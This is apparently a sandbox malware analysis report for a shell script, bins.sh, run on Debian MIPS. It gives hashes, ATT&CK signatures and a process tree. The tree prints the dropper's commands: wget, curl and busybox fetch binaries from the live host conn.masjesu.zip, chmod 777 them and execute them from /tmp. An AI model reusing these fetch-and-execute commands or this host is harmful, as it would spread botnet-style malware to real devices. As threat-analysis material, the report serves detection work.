Analysis
- max time kernel: 149s
- max time network: 20s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 27-10-2024 10:08
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 38c016b5fafe4cb231ee103b3d469c38
- SHA1: 11bf75788a74d2c7bf1a077fb4baedebb0fbf051
- SHA256: 6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
- SHA512: bb6b857e72ce4063f5fb64cfe1b4950071040ba0b7ae6c3bbab6db49173f1bf43357fefdcd09c87d5c69920a5366e780036c41f4d1bf597042bb693386d5e86a
- SSDEEP: 192:C2i/8cZEED6O20nMNso9OuNSWso9Ou32i/8cLEED6Ol:C2i/8cZEED6O20nMNso9OuNSWso9Ou3Z
Malware Config
Signatures
- File and Directory Permissions Modification  1 TTPs  3 IoCs
  Adversaries may modify file or directory permissions to evade defenses.
  Processes:
    pid   process
    740   chmod
    748   chmod
    759   chmod
- Executes dropped EXE  3 IoCs
  Processes:
    ioc                                          pid   process
    /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH      741   07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
    /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF      749   XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
    /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG      760   He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
- Reads runtime system information
  Processes:
    description               ioc                              process
    File opened for reading   /proc/sys/crypto/fips_enabled    curl
    File opened for reading   /proc/sys/crypto/fips_enabled    curl
    File opened for reading   /proc/sys/crypto/fips_enabled    curl
    File opened for reading   /proc/sys/crypto/fips_enabled    curl
- System Network Configuration Discovery  1 TTPs  11 IoCs
  Adversaries may gather information about the network configuration of a system.
  Processes:
    pid   process
    765   wget
    774   curl
    712   wget
    744   wget
    747   busybox
    752   wget
    753   curl
    755   busybox
    730   curl
    738   busybox
    745   curl
- Writes file to tmp directory  10 IoCs
  Malware often drops required files in the /tmp directory.
  Processes:
    description                    ioc                                          process
    File opened for modification   /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH      wget
    File opened for modification   /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH      curl
    File opened for modification   /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF      busybox
    File opened for modification   /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG      wget
    File opened for modification   /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG      curl
    File opened for modification   /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG      busybox
    File opened for modification   /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS      wget
    File opened for modification   /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH      busybox
    File opened for modification   /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF      wget
    File opened for modification   /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF      curl
Processes
- /tmp/bins.sh  (command: /tmp/bins.sh)  PID:707
  - /bin/rm  (command: /bin/rm bins.sh)  PID:710
  - /usr/bin/wget  (command: wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH)  PID:712
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl  (command: curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH)  PID:730
    signatures: Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox  (command: /bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH)  PID:738
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/chmod  (command: chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH)  PID:740
    signatures: File and Directory Permissions Modification
  - /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH  (command: ./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH)  PID:741
    signatures: Executes dropped EXE
  - /bin/rm  (command: rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH)  PID:743
  - /usr/bin/wget  (command: wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF)  PID:744
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl  (command: curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF)  PID:745
    signatures: Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox  (command: /bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF)  PID:747
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/chmod  (command: chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF)  PID:748
    signatures: File and Directory Permissions Modification
  - /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF  (command: ./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF)  PID:749
    signatures: Executes dropped EXE
  - /bin/rm  (command: rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF)  PID:751
  - /usr/bin/wget  (command: wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG)  PID:752
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl  (command: curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG)  PID:753
    signatures: Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox  (command: /bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG)  PID:755
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/chmod  (command: chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG)  PID:759
    signatures: File and Directory Permissions Modification
  - /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG  (command: ./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG)  PID:760
    signatures: Executes dropped EXE
  - /bin/rm  (command: rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG)  PID:763
  - /usr/bin/wget  (command: wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS)  PID:765
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl  (command: curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS)  PID:774
    signatures: Reads runtime system information; System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 95KB
  MD5: c20c610e14b8e59f5f8258a55fe7f27d
  SHA1: e59a0b83d9882f2770f052a213cad25b0cbd53fc
  SHA256: adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
  SHA512: dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
- Filesize: 93KB
  MD5: 8fad5e89ce3d2b6159ac2ce2fdf7c084
  SHA1: 27105a304b9bb7cd8a663d1b4da1d92fd8eea355
  SHA256: 24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
  SHA512: 71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
- Filesize: 84KB
  MD5: 64ece99ca4ab1c1405f5a3335d64a960
  SHA1: b7395f2320a5bdadb78943b268708965cdbd1d74
  SHA256: aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
  SHA512: bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
- Filesize: 101KB
  MD5: a7e686eb3f74b104a5520f08cfd54eb5
  SHA1: 58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
  SHA256: 617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
  SHA512: 2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df